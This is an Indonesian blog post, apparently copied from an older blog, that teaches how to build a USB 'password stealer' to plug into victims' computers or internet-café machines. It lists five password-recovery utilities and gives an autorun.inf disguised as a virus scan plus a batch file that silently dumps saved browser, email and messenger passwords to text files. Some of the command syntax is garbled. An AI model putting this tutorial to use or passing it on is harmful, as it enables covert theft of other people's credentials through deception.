Cara Membuat Flasdisk Pencuri Password - Espada Fajar

Latest

buka mata buka telinga

Cara Membuat Flasdisk Pencuri Password


Sekarang Flashdisk pencuri password siap, yang harus Anda lakukan adalah masukkan ke komputer untuk para korban atau Warnet ditempat kalian dan popup akan muncul dalam jendela popup pilih opsi (release of virus detection) segera setelah Anda klik setelah jendela. Seperti kita ketahui bahwa Windows menyimpan sebagian besar password Anda setiap hari, seperti password MSN Messenger untuk Yahoo, password, password dll Myspace. Kebanyakan orang memiliki keterbatasan waktu dan karena itu telah mengkonfigurasi browser atau aplikasi untuk menyimpan password mereka, seperti yang kita tahu ada banyak piranti untuk memulihkan password disimpan artikel ini saya akan menjelaskan tentang cara membuat Flashdisk pencuri password dan mencuri password yang tersimpan.


Tools: 

MessenPass  -  MessenPass adalah pemulihan password alat yang mengungkapkan password dari aplikasi pesan instan. 

Mail PassView  -  Mail PassView adalah pemulihan alat sandi kecil yang mengungkapkan password dan rincian rekening lainnya dari Outlook Express, Windows Mail, POP3, dll 

PassView IE  -  IE PassView adalah program kecil yang membantu kita untuk melihat password yang tersimpan di Internet Explorer. 
Protected storage viewer pass (PSPV)  -   Protected Storage PassView adalah utilitas kecil yang mengungkapkan password disimpan di komputer Anda melalui Internet Explorer, Outlook Express dan MSN Explorer. 
Password Fox  -  Sandi rubah adalah program kecil yang digunakan untuk melihat password yang tersimpan di Mozilla Firefox.
Sekarang di sini adalah langkah demi langkah tutorial untuk membuat  Flashdisk pencuri password :
Tahap berikutnya:

1. Pertama download 5 tool tersebut diatas  dan menyalin file executable (Exe (mspass.exe, mailpv.exe, iepv.exe, pspv.exe dan passwordfox.exe).) pada drive USB.
2. Buka Notepad dan ketik berikut:


[Autorun]
open = launch.bat
ACTION = Perform a Virus Scan

Simpan file sebagai autorun.inf (jangan lupa ekstensi. inf) 
Sekarang salin file autorun.inf pada USB Flashdisk.
3. Sekarang buka lagi file baru di Notepad dan ketik berikut ini:
mspass.exe start / sText mspass.txt
mailpv.exe start / sText mailpv.txt
iepv.exe start / sText iepv.txt
pspv.exe start / sText pspv.txt
passwordfox.exe start / sText passwordfox.txt

Simpan file sebagai launch.bat (jangan lupa ekstensi. bat)
Sekarang salin file autorun.inf pada USB Flashdisk. 
Sekarang Flashdisk pencuri password siap yang harus Anda lakukan adalah masukkan ke komputer untuk para korban dan popup akan muncul dalam jendela popup pilih opsi (release of virus detection) segera setelah Anda mengklik jendela berikut.

Usb password stealer

Setelah ini Anda bisa melihat password yang tersimpan dalam file txt.


sumber : http://gogorontalo.blogspot.com/2012/06/cara-membuat-flasdisk-pencuri-password.html

2 comments: